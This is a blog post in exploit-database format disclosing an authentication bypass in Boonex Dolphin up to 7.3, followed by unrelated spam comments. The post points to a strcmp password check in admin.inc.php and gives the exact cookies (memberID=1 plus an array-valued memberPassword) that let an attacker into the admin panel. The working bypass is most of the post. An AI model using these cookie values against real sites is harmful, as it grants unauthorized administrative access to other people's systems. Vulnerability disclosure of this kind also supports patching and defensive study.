# Exploit Title : Boonex Dolphin all versoin <= 7.3 Authentication Bypass
# Exploit Author : Saadat Ullah saadi_linux[@]rocketmail.com
# Software Link : https://www.boonex.com
# Author HomePage : http://security-geeks.blogspot.com
Proof of Concept
File: admin.inc.php
Line: 187
Code: (strcmp($aProfile['Password'], $passwd) != 0)
$passwd is equal to Cookie parameter memberpassword
Bug:
According to PHP documentation strcmp will compare strings, but what if we provide an array???
So, simple bypass is to put two cookies in browser
memberID=1
memberPassword[]=blah --->array
This will allow the attacker to bypass the authentication and can also enter in admin panel.
#Independent Pakistani Security Researcher
3 comments:
Hey Gyss Check out this...
Softpro Learning Center (SLC)is the training wing of Softpro India Computer Technologies Pvt.
Limited. SLC established itself in the year 2008.
SLC offer an intensive and extensive range of training/internship programs for B.Tech, BCA, MCA & Diploma students.
Softpro Learning Center is a best institute in Lucknow extends in depth knowledge of technology like .Net, Java, PHP and Android and also an opportunity to practically apply their fundamentals. SLC’s objective is to provide skilled manpower to support the vast development programs.
I am very happy when read this blog post because blog post written in good manner and write on good topic.
Thanks for sharing valuable information.
Web Design Company Bangalore,
Digital Marketing Company
Antivirus
Computer Virus
Networking
Oops
Laravel tutorial More
Internet
Java
Laravel
Post a Comment